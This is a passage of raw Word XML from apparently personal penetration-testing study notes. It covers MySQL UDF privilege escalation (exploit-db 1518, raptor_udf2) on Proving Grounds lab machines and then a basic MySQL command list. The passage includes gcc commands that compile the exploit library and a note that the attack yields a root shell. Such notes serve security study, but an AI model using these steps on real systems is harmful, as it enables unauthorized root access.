    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root: (no password)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to create user and database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We had to do this in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sams</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG play. Here is the walkthrough </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId532">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Medium Article behind paywall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId533">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free version using Freedium</w:t>
      </w:r>
    </w:p>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xkkcew8s3wl7" w:id="216"/>
      <w:bookmarkEnd w:id="216"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql User-Defined Function (UDF) priv esc for version ⅘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId534">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/1518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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for any mysql 4.x and 5.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId535">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pebbles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when they ran myslq --version and saw it was MySql 5.7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="469"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And they ran it to get root shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A28">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack assumes you already have foothold in target machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A29">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Tib3rius Service Exploits video, they saw from Linux Smart Enumeration that we can login as root in mysql without password, and that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld (daemon) process is running as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="584200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="401" name="image268.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image268.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42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A2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="494" name="image487.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image487.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53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A2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then check the version of mysql (assuming we are inside of the target machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: we want to find version of mysqld NOT mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although in the Pebbles PG Practice as mentioned above, they check mysql which is weird</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is because mysql is just the client-side tool we use. mysqld version belongs to the database version of mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld --version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5695950" cy="600075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="333" name="image315.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image315.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId537"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56959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t xml:space="preserve">Then, they found this exploitDB that applies to version 4 and 5 of mySQL, and it allows for privilege escalation. It says version 5.0, but it seemed to work here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId538">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/1518</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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t xml:space="preserve">Commands ran (from exploitDB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -g -c raptor_udf2.c -fPIC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fPIC</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">they added themselves in the video, because target machine is 64-bit and I think the exploit was for 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You generally use -fPIC whenever you’re compiling code that will be turned into a shared library (.so file) or loaded as a plugin/module by another program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5695950" cy="4800600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="383" name="image385.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image385.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId539"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56959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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e8z0h2fued0o" w:id="217"/>
      <w:bookmarkEnd w:id="217"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mysql commands</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most important mysql commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW databases;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Prints out the databases we can access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE {database_name}; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Set to use the database named {database_name}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW tables; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Prints out the available tables inside the current database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM {table_name};</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Prints out all the data from the table {table_name}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE user_name='leon';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1410"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001A4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1410"/>
        </w:numPr>
